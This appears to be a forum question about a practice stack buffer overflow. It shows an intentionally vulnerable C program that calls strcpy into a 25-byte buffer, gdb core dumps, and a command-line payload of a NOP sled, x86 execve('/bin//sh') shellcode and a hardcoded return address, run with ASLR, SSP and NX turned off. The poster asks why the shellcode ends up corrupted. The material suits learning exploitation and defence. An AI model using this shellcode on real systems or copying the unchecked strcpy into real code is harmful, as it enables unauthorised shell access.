Broken Shellcode in Core File

I am testing very simple buffer-overflow on the code below.

int main(int argc, char** argv) {
char buffer[25];
strcpy(buffer, argv[1]);

return 0;
}

I have managed to find that I need to write 37byte to reach RET location using gdb. Therefore, I first inserted "AAAA..." to crash the program and get the core file. It ended with SIGSEGV, and I could find that the location of char buffer[25] is 0xbffff6c7.

Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/20wx $esp-50
0xbffff6be: 0xffff0804  0x1dd6ffff  0x414141e5  0x41414141
0xbffff6ce: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff6de: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff6ee: 0x41414141  0x41414141  0x00414141  0xc858bfff
0xbffff6fe: 0x0000b7fd  0xf71c0000  0xf790bfff  0x0000bfff
(gdb) x/s 0xbffff6c7
0xbffff6c7:  'A' <repeats 50 times>

Then I sent the payload with the combination of Shellcode, NOP Instructions and the RET value (0xbffff6c7). However, It crashed again with the SIGSEGV.

kuics@kuics-VirtualBox:~/practice$ ./vuln $(python -c 'print "\x90"*12 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\xc7\xf6\xff\xbf"')
Segmentation fault (core dumped)

Being confused, I opened the updated core file. Looking into same location, I found that the Shellcode was broken with many 0x00 bytes, in the middle. And I'm wondering how it could happen. Are there any possible scenarios?

(gdb) x/20wx $esp-50
0xbffff6ae: 0xf6c70804  0xf8b2bfff  0x9ff4bfff  0x84a10804
0xbffff6be: 0xffff0804  0x1dd6ffff  0x909090e5  0x90909090
0xbffff6ce: 0x90909090  0x50c03190  0x732f2f68  0x622f6868
0xbffff6de: 0x00006e69  0x622f0000  0x2f2f6e69  0x00006873 <= there
0xbffff6ee: 0x00000000  0xf7840000  0xf790bfff  0xc858bfff

• I have turned off ASLR, SSP(Stack-Smashing Protector) and NX Bit already.